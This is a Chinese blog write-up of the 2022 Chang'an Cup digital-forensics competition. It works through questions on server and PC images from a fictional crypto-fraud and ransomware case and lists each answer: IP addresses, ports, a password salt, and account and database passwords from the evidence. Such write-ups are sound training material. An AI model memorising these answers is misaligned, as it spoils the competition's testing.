<!DOCTYPE html>
<html lang="en">

<head>
	<meta http-equiv="content-type" content="text/html; charset=utf-8">
	<meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
	
	<!-- title -->
	
	<title>
	
		2022长安杯个人赛复盘 | 
	 
	SUPER
	</title>
	
	<!-- keywords,description -->
	 

	<!-- favicon -->
	
	<link rel="shortcut icon" href="/favicon.ico">
	


	<!-- search -->
	<script>
		var searchEngine = "https://www.google.com/search?q=";
		if(typeof searchEngine == "undefined" || searchEngine == null || searchEngine == ""){
			searchEngine = "https://www.google.com/search?q=";
		}
		var homeHost = "https://www.bilibili.com/video/BV1GJ411x7h7/?spm_id_from=333.337.search-card.all.click";
		if(typeof homeHost == "undefined" || homeHost == null || homeHost == ""){
			homeHost = window.location.host;
		}
	</script>


	
<link rel="stylesheet" href="/css/main.css">

	
<link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/4.7.0/css/font-awesome.min.css">

	
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@9.17.1/build/styles/darcula.min.css">

	
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css">


	
<script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>

	
<script src="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>

	
<script src="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@9.17.1/build/highlight.min.js"></script>

	
<script src="https://cdn.jsdelivr.net/npm/jquery-pjax@2.0.1/jquery.pjax.min.js"></script>

	
<script src="/js/main.js"></script>


	
		
<script src="https://cdn.jsdelivr.net/npm/leancloud-storage/dist/av-min.js"></script>

		
<script src="https://cdn.jsdelivr.net/npm/valine@v1.5.1/dist/Valine.min.js"></script>

	
	
		<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
	

<meta name="generator" content="Hexo 6.3.0"></head>

<body>
	<header id="header">
    <a id="title" href="/" class="logo">SUPER</a>

	<ul id="menu">
    
      <li class="menu-item">
        <a href="/about" class="menu-item-link">观鱼</a>
      </li>
    

    
      <li class="menu-item">
        <a href="/tags" class="menu-item-link">🏷</a>
      </li>
    

    
      <li class="menu-item">
        <a href="/categories" class="menu-item-link">应该分了</a>
      </li>
    

    
      
      
        <li class="menu-item">
          <a href='https://aaanz.github.io/' class="menu-item-link" target="_blank">
            激情链接--anz
          </a>
        </li>
      
        <li class="menu-item">
          <a href='https://blog.stevesensei.work' class="menu-item-link" target="_blank">
            在线视频--stevesensi
          </a>
        </li>
      
        <li class="menu-item">
          <a href='https://Charmersix.github.io' class="menu-item-link" target="_blank">
            劲歌热舞--CHARMERsix
          </a>
        </li>
      
    
  
    
	</ul>
</header>

	
<div id="sidebar">
	<button id="sidebar-toggle" class="toggle" ><i class="fa fa-arrow-right " aria-hidden="true"></i></button>
	
	<div id="site-toc">
		<input id="search-input" class="search-input" type="search" placeholder="按回车全站搜索">
		<div id="tree">
			

			
							<ul>
								<li class="directory">
									<a href="#" class="directory">
										<i class="fa fa-plus-square-o"></i>
										学习笔记
									</a>
									
							<ul>
								<li class="directory">
									<a href="#" class="directory">
										<i class="fa fa-plus-square-o"></i>
										AI
									</a>
									
							<ul>
								<li class="file">
									<a href="/2023/05/14/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/AI/openpose%E9%83%A8%E7%BD%B2/">
                     
										    Windows下的openpose实战部署操作
                     
									</a>
								</li>
								<div class="article-toc" style="display: none;"></div>
							</ul>
			
								</li>
								
							</ul>
			
							<ul>
								<li class="file">
									<a href="/2025/03/20/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/RTSP%E5%8D%8F%E8%AE%AE%E5%AD%A6%E4%B9%A0/">
                     
										    RTSP协议学习
                     
									</a>
								</li>
								<div class="article-toc" style="display: none;"></div>
							</ul>
			
							<ul>
								<li class="file">
									<a href="/2025/03/20/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/wireshark/">
                     
										    威鲨
                     
									</a>
								</li>
								<div class="article-toc" style="display: none;"></div>
							</ul>
			
								</li>
								
							</ul>
			
							<ul>
								<li class="directory">
									<a href="#" class="directory">
										<i class="fa fa-plus-square-o"></i>
										比赛复盘
									</a>
									
							<ul>
								<li class="file active">
									<a href="/2023/05/12/%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%9B%98/2022%E9%95%BF%E5%AE%89%E6%9D%AF%E4%B8%AA%E4%BA%BA%E8%B5%9B%E5%A4%8D%E7%9B%98/">
                     
										    2022长安杯个人赛复盘
                     
									</a>
								</li>
								<div class="article-toc" style="display: none;"></div>
							</ul>
			
							<ul>
								<li class="file">
									<a href="/2025/01/09/%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%9B%98/2023%E9%BE%99%E4%BF%A1%E6%9D%AF%E5%A4%8D%E7%9B%98/">
                     
										    2023龙信杯复盘
                     
									</a>
								</li>
								<div class="article-toc" style="display: none;"></div>
							</ul>
			
							<ul>
								<li class="file">
									<a href="/2025/03/20/%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%9B%98/misc2022%E5%B9%B4/">
                     
										    2022年misc杂烩
                     
									</a>
								</li>
								<div class="article-toc" style="display: none;"></div>
							</ul>
			
							<ul>
								<li class="file">
									<a href="/2025/03/20/%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%9B%98/misc%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/">
                     
										    misc流量分析
                     
									</a>
								</li>
								<div class="article-toc" style="display: none;"></div>
							</ul>
			
							<ul>
								<li class="file">
									<a href="/2025/03/20/%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%9B%98/%E7%9B%98%E5%8F%A4%E7%9F%B3%E5%88%9D%E8%B5%9B%E5%A4%8D%E7%9B%98/">
                     
										    盘古石初赛复盘
                     
									</a>
								</li>
								<div class="article-toc" style="display: none;"></div>
							</ul>
			
							<ul>
								<li class="file">
									<a href="/2022/11/06/%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%9B%98/%E7%BE%8E%E4%BA%9A%E6%9D%AF2021%E5%A4%8D%E7%9B%98/">
                     
										    2021美亚杯复盘
                     
									</a>
								</li>
								<div class="article-toc" style="display: none;"></div>
							</ul>
			
								</li>
								
							</ul>
			
							<ul>
								<li class="directory">
									<a href="#" class="directory">
										<i class="fa fa-plus-square-o"></i>
										车联网安全
									</a>
									
							<ul>
								<li class="file">
									<a href="/2025/01/09/%E8%BD%A6%E8%81%94%E7%BD%91%E5%AE%89%E5%85%A8/%E8%BD%A6%E8%81%94%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%EF%BC%88%E5%AE%9E%E4%B9%A0%EF%BC%9A2024%E5%B9%B412%E6%9C%8831%E6%97%A5%E8%B5%B7%EF%BC%89/">
                     
										    车联网安全学习
                     
									</a>
								</li>
								<div class="article-toc" style="display: none;"></div>
							</ul>
			
								</li>
								
							</ul>
			
		</div>
	</div>
</div>

	<!-- 引入正文 -->
	<div id="content">
		<h1 id="article-title">
	2022长安杯个人赛复盘
</h1>

<!-- meta -->
<div class="article-meta">
	
		<span>
			阅读量:<span id="/2023/05/12/%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%9B%98/2022%E9%95%BF%E5%AE%89%E6%9D%AF%E4%B8%AA%E4%BA%BA%E8%B5%9B%E5%A4%8D%E7%9B%98/" class="leancloud_visitors" data-flag-title="2022长安杯个人赛复盘"></span>
		</span>
	

	<span>SUPER</span>
	<span>2023-05-12 16:26:23</span>

  <div id="article-categories">
    
		  <span>Categories：</span>
      
          
              <span>
                  <i class="fa fa-folder" aria-hidden="true">
                  <a href="/categories/比赛复盘/">比赛复盘</a>
                  </i>
                
              </span>
          
      
    

    
		    <span>Tags：</span>
        
            
                <span>
                    <i class="fa fa-tag" aria-hidden="true">
                    <a href="/tags/电子取证/">电子取证</a>
                    </i>
                </span>
            
        
    
  </div>

</div>

<!-- content -->
<div id="article-content">
	<p>我真是绷不住了刚写了一千字，关机就没了呜呜呜呜呜呜呜呜呜呜</p>
<p>容器挂载密码：2022.4th.changancup!</p>
<h3 id="案件背景："><a href="#案件背景：" class="headerlink" title="案件背景："></a>案件背景：</h3><p>某地警方接到受害人报案称其在某虚拟币交易网站遭遇诈骗，该网站号称使用”USTD币“购买所谓的”HT币”，受害人充值后不但“HT币”无法提现、交易，而且手机还被恶意软件锁定勒索。警方根据受害人提供的虚拟币交易网站调取了对应的服务器镜像并对案件展开侦查。</p>
<h2 id="检材一"><a href="#检材一" class="headerlink" title="检材一"></a>检材一</h2><h3 id="1-检材1的SHA256值为"><a href="#1-检材1的SHA256值为" class="headerlink" title="1 检材1的SHA256值为"></a>1 检材1的SHA256值为</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105093117452.png" alt="image-20230105093117452"></p>
<p><strong>9E48BB2CAE5C1D93BAF572E3646D2ECD26080B70413DC7DC4131F88289F49E34</strong></p>
<h3 id="2-分析检材1，搭建该服务器的技术员IP地址是多少？用该地址解压检材2"><a href="#2-分析检材1，搭建该服务器的技术员IP地址是多少？用该地址解压检材2" class="headerlink" title="2 分析检材1，搭建该服务器的技术员IP地址是多少？用该地址解压检材2"></a>2 分析检材1，搭建该服务器的技术员IP地址是多少？用该地址解压检材2</h3><p>这算是一种方法：</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105093309624.png" alt="image-20230105093309624"></p>
<p>另一种方法是：</p>
<p>仿真出来</p>
<p>使用命令last查看</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105093802186.png" alt="image-20230105093802186"></p>
<p><strong>172.16.80.100</strong></p>
<h3 id="3-检材1中，操作系统发行版本号为"><a href="#3-检材1中，操作系统发行版本号为" class="headerlink" title="3 检材1中，操作系统发行版本号为"></a>3 检材1中，操作系统发行版本号为</h3><p>一种方法：</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105093859750.png" alt="image-20230105093859750"></p>
<p>或者火眼仿真软件里回给出操作系统型号：</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105093913944.png" alt="image-20230105093913944"></p>
<p><strong>7.5.1804</strong></p>
<h3 id="4-检材1系统中，网卡绑定的静态IP地址为"><a href="#4-检材1系统中，网卡绑定的静态IP地址为" class="headerlink" title="4 检材1系统中，网卡绑定的静态IP地址为"></a>4 检材1系统中，网卡绑定的静态IP地址为</h3><p>在仿真好的系统里使用命令ifconfig</p>
<p>查看静态IP地址：</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105094538948.png" alt="image-20230105094538948"></p>
<p>或者是直接在</p>
<p>证据软件里找：</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105094747952.png" alt="image-20230105094747952"></p>
<p><strong>172.16.80.133</strong></p>
<h3 id="5-检材1中，网站jar包所存放的目录是"><a href="#5-检材1中，网站jar包所存放的目录是" class="headerlink" title="5 检材1中，网站jar包所存放的目录是"></a>5 检材1中，网站jar包所存放的目录是</h3><p>这个的话其实查看他的历史命令</p>
<p>就基本知道了</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105095013959.png" alt="image-20230105095013959"></p>
<p>jar包基本上都是在这</p>
<p>如果不放心可以由仿真系统找一下（为了方便操作可以ssh连接一下）</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105095251466.png" alt="image-20230105095251466"></p>
<p>&#x2F;web&#x2F;app&#x2F;</p>
<p>对于ssh连接，我说实话，快把我搞崩溃了</p>
<p>浪费了太多时间了mad</p>
<p> 但是当真连上的时候，快把我zei死辣哈哈哈</p>
<p>很开心</p>
<p>下面是连接的过程：</p>
<p>先将虚拟机关机</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105104218538.png" alt="image-20230105104218538"></p>
<p>选择自定义：特定虚拟网络</p>
<p>VMnet2（其实选哪个都行，后面都要编辑</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105104312308.png" alt="image-20230105104312308"></p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105104903446.png" alt="image-20230105104903446"></p>
<p>重要的是将子网ip配置成虚拟机的网络地址，其他的就不用管了，VMware会自己补全</p>
<p>找检材虚拟机的网络地址是仿真，或者按照之前几道题的操作，便可以找到。</p>
<p>这是我的操作过程，有可能有更简便的方法</p>
<p>我不知道呜呜呜呜，这算是经过几天的模索，找出的方法。毕竟我也是看别人复盘做的，当我看到</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105105820539.png" alt="image-20230105105820539"></p>
<p>这句话的时候，我就已经绷不住了，我是真不会啊，无所谓，人的主观能动性是强大的，嘿嘿嘿，解决了就没问题了。</p>
<h3 id="6-检材1中，监听7000端口的进程对应文件名为"><a href="#6-检材1中，监听7000端口的进程对应文件名为" class="headerlink" title="6 检材1中，监听7000端口的进程对应文件名为"></a>6 检材1中，监听7000端口的进程对应文件名为</h3><p>这个说是需要去下载jar包，解压然后翻代码</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105113751678.png" alt="image-20230105113751678"></p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105114033773.png" alt="image-20230105114033773"></p>
<p><strong>cloud.jar</strong></p>
<p>或者是将检材二中网站的运行文件复制到检材一中，才能实现相关功能，想要不需要检材二中的运行文件直接成功搭建网站，难度是非常大的哈哈哈，比赛的时候，伟哥弄了四个小时，哈哈哈崩溃了</p>
<p>具体操作流程：</p>
<p>打开检材二，找到D盘</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105220708739.png" alt="image-20230105220708739"></p>
<p>早知道好好翻翻，哈哈哈，没办法时间实在是太紧了</p>
<p>把start_web.sh复制一下，上传到finalshell上，需要注意放在&#x2F;web&#x2F;app下</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105221514012.png" alt="image-20230105221514012"></p>
<p>命令</p>
<p>都是从检材一历史命令里面找到的</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105221447462.png" alt="image-20230105221447462"></p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105221540717.png" alt="image-20230105221540717"></p>
<p>这样应该算是成功了</p>
<p>回到检材二的仿真系统中</p>
<p>访问搭建的网站</p>
<p>嘿嘿嘿</p>
<p>进去了</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105221759037.png" alt="image-20230105221759037"></p>
<p>开香槟</p>
<h3 id="7-检材1中，网站管理后台页面对应的网络端口为"><a href="#7-检材1中，网站管理后台页面对应的网络端口为" class="headerlink" title="7 检材1中，网站管理后台页面对应的网络端口为"></a>7 检材1中，网站管理后台页面对应的网络端口为</h3><p>不易找：</p>
<p>把网站开启了，直接通过历史记录查找后台管理进去后</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105222200244.png" alt="image-20230105222200244"></p>
<p>在网址一栏能够看到9090端口</p>
<p>9090</p>
<h3 id="8-检材1中，网站前台页面里给出的APK的下载地址是"><a href="#8-检材1中，网站前台页面里给出的APK的下载地址是" class="headerlink" title="8 检材1中，网站前台页面里给出的APK的下载地址是"></a>8 检材1中，网站前台页面里给出的APK的下载地址是</h3><p>一个样开启了网站说话都硬气</p>
<p><img src="C:\Users\lenovo\Desktop\image-20230105222342463.png" alt="image-20230105222342463"></p>
<p><a target="_blank" rel="noopener" href="https://pan.forensix.cn/f/c45ca511c7f2469090ad/?dl=1">https://pan.forensix.cn/f/c45ca511c7f2469090ad/?dl=1</a></p>
<h3 id="9-检材1中，网站管理后台页面调用的用户表-admin-里的密码字段加密方式为"><a href="#9-检材1中，网站管理后台页面调用的用户表-admin-里的密码字段加密方式为" class="headerlink" title="9 检材1中，网站管理后台页面调用的用户表(admin)里的密码字段加密方式为?"></a>9 检材1中，网站管理后台页面调用的用户表(admin)里的密码字段加密方式为?</h3><p>多的不讲好吧，根本不会做，看着大佬的wp都不想复现</p>
<p>md5</p>
<h3 id="10-分析检材1，网站管理后台登录密码加密算法中所使用的盐值是"><a href="#10-分析检材1，网站管理后台登录密码加密算法中所使用的盐值是" class="headerlink" title="10 分析检材1，网站管理后台登录密码加密算法中所使用的盐值是"></a>10 分析检材1，网站管理后台登录密码加密算法中所使用的盐值是</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105224033079.png" alt="image-20230105224033079"></p>
<p><strong>XehGyeyrVgOV4P8Uf70REVpIw3iVNwNs</strong></p>
<h2 id="检材二："><a href="#检材二：" class="headerlink" title="检材二："></a>检材二：</h2><p>根据IP地址落地及后续侦查，抓获了搭建网站的技术员，扣押了其个人电脑并制作镜像“检材2”，分析所有掌握的检材回答下列问题</p>
<p>有一说一，检材一有很多题是需要检材二里面的信息去解锁的，所以由此可见对于全部检材的了解非常重要。</p>
<h3 id="11-检材2中，windows账户Web-King的登录密码是"><a href="#11-检材2中，windows账户Web-King的登录密码是" class="headerlink" title="11 检材2中，windows账户Web King的登录密码是"></a>11 检材2中，windows账户Web King的登录密码是</h3><p>一种是直接通过软件查找：</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105154947114.png" alt="image-20230105154947114"></p>
<p>另一种就是仿真出来</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105155055531.png" alt="image-20230105155055531"></p>
<p>这就知道了，不用找，相较来说比较简单。</p>
<p><strong>135790</strong></p>
<h3 id="12-检材2中，除检材1以外，还远程连接过哪个IP地址？并用该地址解压检材3"><a href="#12-检材2中，除检材1以外，还远程连接过哪个IP地址？并用该地址解压检材3" class="headerlink" title="12 检材2中，除检材1以外，还远程连接过哪个IP地址？并用该地址解压检材3"></a>12 检材2中，除检材1以外，还远程连接过哪个IP地址？并用该地址解压检材3</h3><p>第一种方法：</p>
<p>关键词是远程连接</p>
<p>找ssh呗，找到了，然后代到检材三试试能不能解压。</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105155327931.png" alt="image-20230105155327931"></p>
<p>第二种方法：</p>
<p>仿真出来</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105160750911.png" alt="image-20230105160750911"></p>
<p><strong>172.16.80.128</strong></p>
<h3 id="13-检材2中，powershell中输入的最后一条命令是"><a href="#13-检材2中，powershell中输入的最后一条命令是" class="headerlink" title="13 检材2中，powershell中输入的最后一条命令是"></a>13 检材2中，powershell中输入的最后一条命令是</h3><p>仿真后打开powershell，方向键向上</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105162635809.png" alt="image-20230105162635809"></p>
<p>或者找路径</p>
<p>检材2.E01&#x2F;分区6&#x2F;Users&#x2F;Web King&#x2F;AppData&#x2F;Roaming&#x2F;Microsoft&#x2F;Windows&#x2F;PowerShell&#x2F;PSReadLine&#x2F;ConsoleHost_history.txt</p>
<p>找powershell历史命令文件</p>
<p>（我说实话我也不知道在哪，我反正记不住，可以找到大概位置直接搜powershell嘿嘿嘿，都能搜出来</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105163601605.png" alt="image-20230105163601605"></p>
<p><strong>ipconfig</strong></p>
<h3 id="14-检材2中，下载的涉案网站源代码文件名为"><a href="#14-检材2中，下载的涉案网站源代码文件名为" class="headerlink" title="14 检材2中，下载的涉案网站源代码文件名为"></a>14 检材2中，下载的涉案网站源代码文件名为</h3><p>涉案网站就是这个</p>
<p>结合一下网站名称和下载文件得出</p>
<p>同样也可以从仿真出来的系统中找到</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105165655140.png" alt="image-20230105165655140"></p>
<p>很难不赞同</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105164423834.png" alt="image-20230105164423834"></p>
<p>ZTuoExchange_framework-master.zip</p>
<h3 id="15-检材2中，网站管理后台root账号的密码为"><a href="#15-检材2中，网站管理后台root账号的密码为" class="headerlink" title="15 检材2中，网站管理后台root账号的密码为"></a>15 检材2中，网站管理后台root账号的密码为</h3><p>其实这个猜一下root平常的密码就是root哈哈哈</p>
<p>但是取证要讲究正确，不会冤枉任何一个好人（任何邪恶终将绳之以法</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105170148042.png" alt="image-20230105170148042"></p>
<p>直接在保存的密码中就找到了（哈哈哈，出题人还是蛮银杏化的</p>
<p>仿真没找到，应该是水平不够，无所谓，一个找出来就不错了，还要啥自行车啊</p>
<p><strong>root</strong></p>
<h3 id="16-检材2中，技术员使用的WSL子系统发行版本是"><a href="#16-检材2中，技术员使用的WSL子系统发行版本是" class="headerlink" title="16 检材2中，技术员使用的WSL子系统发行版本是"></a>16 检材2中，技术员使用的WSL子系统发行版本是</h3><p>这个好像有坑，我记得我没做对</p>
<p>注意题干 <strong>技术员</strong> </p>
<p>仔细找找</p>
<p>方法一：在powershell里，<code>wsl -l -v</code>查看安装在 Windows 计算机上的 Linux 发行版列表</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105204833766.png" alt="image-20230105204833766"></p>
<p>方法二：<img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105204744763.png" alt="image-20230105204744763"></p>
<p>&#x2F;&#x2F;方法三：也可以直接找到保存子系统的根目录，Windows 下的 wsl 子系统默认统一保存在目录<code>\Users</code></p>
<p>[user]\AppData\Local\Packages&#96;。可以看到两个文件夹的大小和文件数量完全不在一个数量级，使用的哪个子系统可想而知&#x2F;&#x2F;</p>
<p>（这个方法我没找到</p>
<p><strong>20.04</strong></p>
<h3 id="17-检材2中，运行的数据库服务版本号是"><a href="#17-检材2中，运行的数据库服务版本号是" class="headerlink" title="17 检材2中，运行的数据库服务版本号是"></a>17 检材2中，运行的数据库服务版本号是</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105210022121.png" alt="image-20230105210022121"></p>
<p>mysql文件里的表信息就会有</p>
<p><strong>8.0.30</strong></p>
<h3 id="18-上述数据库debian-sys-maint用户的初始密码是"><a href="#18-上述数据库debian-sys-maint用户的初始密码是" class="headerlink" title="18 上述数据库debian-sys-maint用户的初始密码是"></a>18 上述数据库debian-sys-maint用户的初始密码是</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105210651464.png" alt="image-20230105210651464"></p>
<p>百度一下</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105210828355.png" alt="image-20230105210828355"></p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105211753710.png" alt="image-20230105211753710"></p>
<p><strong>ZdQfi7vaXjHZs75M</strong></p>
<h3 id="19-检材3服务器root账号的密码是"><a href="#19-检材3服务器root账号的密码是" class="headerlink" title="19 检材3服务器root账号的密码是"></a>19 检材3服务器root账号的密码是</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105211917107.png" alt="image-20230105211917107"></p>
<p><strong>h123456</strong></p>
<h2 id="检材3："><a href="#检材3：" class="headerlink" title="检材3："></a>检材3：</h2><p>根据网站前端和技术员个人电脑上的线索，发现了网站后端所在的服务器IP并再次调证取得“检材3”，分析所有掌握的检材回答下列问题</p>
<h3 id="20-检材3中，监听33050端口的程序名（program-name）为"><a href="#20-检材3中，监听33050端口的程序名（program-name）为" class="headerlink" title="20 检材3中，监听33050端口的程序名（program name）为"></a>20 检材3中，监听33050端口的程序名（program name）为</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105230613255.png" alt="image-20230105230613255"></p>
<p>docker-proxy</p>
<h3 id="21-除MySQL外，该网站还依赖以下哪种数据库"><a href="#21-除MySQL外，该网站还依赖以下哪种数据库" class="headerlink" title="21 除MySQL外，该网站还依赖以下哪种数据库"></a>21 除MySQL外，该网站还依赖以下哪种数据库</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105230725225.png" alt="image-20230105230725225"></p>
<p>redis.mongo</p>
<h3 id="22-检材3中，MySQL数据库root账号的密码是"><a href="#22-检材3中，MySQL数据库root账号的密码是" class="headerlink" title="22 检材3中，MySQL数据库root账号的密码是"></a>22 检材3中，MySQL数据库root账号的密码是</h3><p>还是在application.properties这个文件里的</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230105231023531.png" alt="image-20230105231023531"></p>
<p>shhl7001</p>
<h3 id="23-检材3中，MySQL数据库在容器内部的数据目录为"><a href="#23-检材3中，MySQL数据库在容器内部的数据目录为" class="headerlink" title="23 检材3中，MySQL数据库在容器内部的数据目录为"></a>23 检材3中，MySQL数据库在容器内部的数据目录为</h3><p>使用history命令可以查看到</p>
<p>历史命令</p>
<p>发现频繁进入&#x2F;data&#x2F;mysql中</p>
<p>还有命令 cat docker-compose.yml</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230106090923641.png" alt="image-20230106090923641"></p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230106090142585.png" alt="image-20230106090142585"></p>
<p><strong>&#x2F;var&#x2F;lib&#x2F;mysql</strong></p>
<h3 id="24-涉案网站调用的MySQL数据库名为"><a href="#24-涉案网站调用的MySQL数据库名为" class="headerlink" title="24 涉案网站调用的MySQL数据库名为"></a>24 涉案网站调用的MySQL数据库名为</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230106092026527.png" alt="image-20230106092026527"></p>
<p>格式：<strong>子协议:&#x2F;&#x2F;服务器名或IP地址:端口号&#x2F;数据库名?参数&#x3D;参数值</strong></p>
<p><strong>b1</strong></p>
<h3 id="25-勒索者在数据库中修改了多少个用户的手机号？"><a href="#25-勒索者在数据库中修改了多少个用户的手机号？" class="headerlink" title="25 勒索者在数据库中修改了多少个用户的手机号？"></a>25 勒索者在数据库中修改了多少个用户的手机号？</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230106143032148.png" alt="image-20230106143032148"></p>
<p>出现了关键词update mobile_phone</p>
<p>3</p>
<h3 id="26-勒索者在数据库中删除的用户数量为"><a href="#26-勒索者在数据库中删除的用户数量为" class="headerlink" title="26 勒索者在数据库中删除的用户数量为"></a>26 勒索者在数据库中删除的用户数量为</h3><p>在操作日志里，我也不知道这是。</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230106142556488.png" alt="image-20230106142556488"></p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230106142619975.png" alt="image-20230106142619975"></p>
<p><strong>28</strong></p>
<h3 id="27-还原被破坏的数据库，分析除技术员以外，还有哪个IP地址登录过管理后台网站？用该地址解压检材4"><a href="#27-还原被破坏的数据库，分析除技术员以外，还有哪个IP地址登录过管理后台网站？用该地址解压检材4" class="headerlink" title="27 还原被破坏的数据库，分析除技术员以外，还有哪个IP地址登录过管理后台网站？用该地址解压检材4"></a>27 还原被破坏的数据库，分析除技术员以外，还有哪个IP地址登录过管理后台网站？用该地址解压检材4</h3><p>将检材2中的完整数据库b1上传到mysql的数据库中</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230106103807444.png" alt="image-20230106103807444"></p>
<p>之后在重启一下docker服务</p>
<p>systemctl  restart docker</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230106103856811.png" alt="image-20230106103856811"></p>
<p>然后再用navicat连上</p>
<p>结合之前几题的答案</p>
<p>ip地址172.16.80.128</p>
<p>docker端口为:33050</p>
<p>用户名：root</p>
<p>密码：shhl7001</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230106104247529.png" alt="image-20230106104247529"></p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230106104324016.png" alt="image-20230106104324016"></p>
<p>连接成功</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230106104549357.png" alt="image-20230106104549357"></p>
<p>在管理者登录日志中找到</p>
<p><strong>172.16.80.197</strong></p>
<h3 id="28-还原全部被删改数据，用户id为500的注册会员的HT币钱包地址为"><a href="#28-还原全部被删改数据，用户id为500的注册会员的HT币钱包地址为" class="headerlink" title="28 还原全部被删改数据，用户id为500的注册会员的HT币钱包地址为"></a>28 还原全部被删改数据，用户id为500的注册会员的HT币钱包地址为</h3><p>在恢复后的数据库中可以找到</p>
<p>member_wallet这个表</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230106105044162.png" alt="image-20230106105044162"></p>
<p>cee631121c2ec9232f3a2f028ad5c89b</p>
<h3 id="29-还原全部被删改数据，共有多少名用户的会员等级为’LV3’"><a href="#29-还原全部被删改数据，共有多少名用户的会员等级为’LV3’" class="headerlink" title="29 还原全部被删改数据，共有多少名用户的会员等级为’LV3’"></a>29 还原全部被删改数据，共有多少名用户的会员等级为’LV3’</h3><p>164</p>
